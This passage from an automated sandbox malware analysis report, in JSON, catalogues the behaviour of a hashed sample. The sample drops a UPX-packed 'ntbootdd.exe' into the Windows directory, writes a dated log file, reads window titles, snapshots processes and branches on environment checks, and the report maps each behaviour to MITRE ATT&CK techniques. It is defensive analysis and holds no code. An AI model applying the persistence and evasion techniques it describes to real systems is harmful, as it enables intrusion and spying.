"Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" writes file \"c:\\windows\\ntbootdd.exe\"\n \"ntbootdd.exe\" writes file \"c:\\windows\\logs\\%osuser%\\10-02-2025\"\n \"ntbootdd.exe\" writes file \"%windir%\\logs\\%osuser%\\10-02-2025\"\n \"ntbootdd.exe\" writes file \"%windir%\\ntbootdd.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" touched file \"C:\\Windows\\ntbootdd.exe\"\n \"ntbootdd.exe\" touched file \"C:\\Windows\\Logs\\%OSUSER%\\10-02-2025\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"208F2E064735793C173BDCBDBCA3A859A4AB1D46DE5333DCE9FC4F3ADECFF360\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"ntbootdd.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"10-02-2025\" has type \"data\"- Location: [%WINDIR%\\Logs\\%OSUSER%\\10-02-2025]- [targetUID: 00000000-00005888]\n \"ntbootdd.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\ntbootdd.exe]- [targetUID: 00000000-00005888]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\msacm32.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\wsock32.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\avicap32.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\MSVFW32.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\iphlpapi.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\advpack.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\MSACM32.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\WINMM.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\WSOCK32.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" reads file \"c:\\208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\"\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" reads file \"c:\\windows\\ntbootdd.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"ntbootdd.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindResourceA\" with parameter \"805450924\" - (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"LoadResource with parameter {'hModule': '805306368', 'hResInfo': '805544472'}\" (UID: 00000000-00006128)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"ntbootdd.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 70160000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000da77c0f8da77010000000000d06b000000000000000068f91200a0fb1200c702dc770100000094f9120000000000006634000203dc77000200000000000000000000e4fb1200a401dc779cf91200626fda7764f8da77e2e7ff777011d06b94fa1200000000000000d5773ff000007011d06b0000000000000000e81e3200d8f91200b69fda7700000000000052746c496e697469616c697a65437269746963616c53656374696f6e00000000d06b0000000000000000f6e7ff0088f9120000000000ecfd120095e1d677e2e7ff77a4f9120000000000bcfa1200ff2bda7766e7ff77 (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000036002805360023053600000000000000000000003200000000010ce012000000000070ed120095e1d677fe0f3700feffffff435cda775059da77aa000000b8000000220536002005360094e11200cce51200000000000000000000000000000000000000000000000000c00f0000000032001c5cd97760d8f275ffffffff1700000044e11200240000000300000034e6120060eb1200cce512008600000070e1120096edda774a053600a06ab0758600000094e11200cce512000000000086008800a06ab07594e11200916cb0754a053600a06ab075a06ab07504e6120002020000 (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006128)\n \"ntbootdd.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200a0745700bcee120080f44777000057000000000089f44777cfa034580200000030ef12002cef120024ee120028ee1200d8ef120095e1d6773838370080ee1200c83a5177f4ee1200d58c497730ef1200c4ee120042a44777a802517704ef1200d2f44777080000006ef5477744f5477777a134580200000070aa16700000130026bb1670d8ee1200020000000000130070aa167008ef120042a44777a80251774cef120010a9167008000000e6a81670c2e14a9e0200000070aa16700000130026bb1670d4745700a074570018ef120080502270d8ef1200f9f21a7066a64eee (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"ntbootdd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006128)\n \"ntbootdd.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"ntbootdd.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"ntbootdd.exe\" called \"GetWindowTextA\" (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetWindowTextA\" with parameter \"Task Switching\" - (UID: 00000000-00005888)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e1d6773e153700fefffffff5f6da77634ddb77806634008ef1d06bbce4d000b2f4da77f6e6ff7778fb12000000d06b0000d06b804ddb77eae6ff77e0000000e000d06b00000000e4fa12005c12d06b78fc1200000000000100000048fb120040f5da77000000000000000034fb1200 (UID: 00000000-00006128)\n \"ntbootdd.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000095e1d677e9662900fefffffff5f6da77634ddb77f06536008ef1596dbce45900b2f4da772195e17778fb12000000596d0000596d804ddb773d95e177e0000000e000596d00000000e4fa12005c12596d78fc1200000000000100000048fb120040f5da77000000000000000034fb1200 (UID: 00000000-00003108)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetLocalTime@KERNEL32.DLL directly followed by \"cmp si, 000Ah\" and \"jnc 30019AACh\" at 00000000-00005888-45279-152-30019A5C\n Found API call GetVersionExA@KERNEL32.DLL directly followed by \"cmp dword ptr [ebp-000000A0h], 01h\" and \"je 30014FA0h\" at 00000000-00005888-45279-393-30014EB4\n Found API call GetLocalTime@KERNEL32.DLL directly followed by \"cmp si, 000Ah\" and \"jnc 3001B958h\" at 00000000-00005888-45279-593-3001B908\n Found API call GetVersionExA@KERNEL32.DLL directly followed by \"cmp eax, 01h\" and \"jne 30019DD7h\" at 00000000-00005888-45279-159-30019D88\n Found API call GetLocalTime@KERNEL32.DLL directly followed by \"cmp si, 000Ah\" and \"jnc 3001BAA8h\" at 00000000-00005888-45279-200-3001BA58\n Found API call GetLocalTime@KERNEL32.DLL directly followed by \"cmp si, 000Ah\" and \"jnc 30019C08h\" at 00000000-00005888-45279-153-30019BB8\n Found API call GetLocalTime@KERNEL32.DLL directly followed by \"cmp si, 000Ah\" and \"jnc 30015014h\" at 00000000-00005888-45279-567-30014FC4", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ntbootdd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"ntbootdd.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00006128)\n 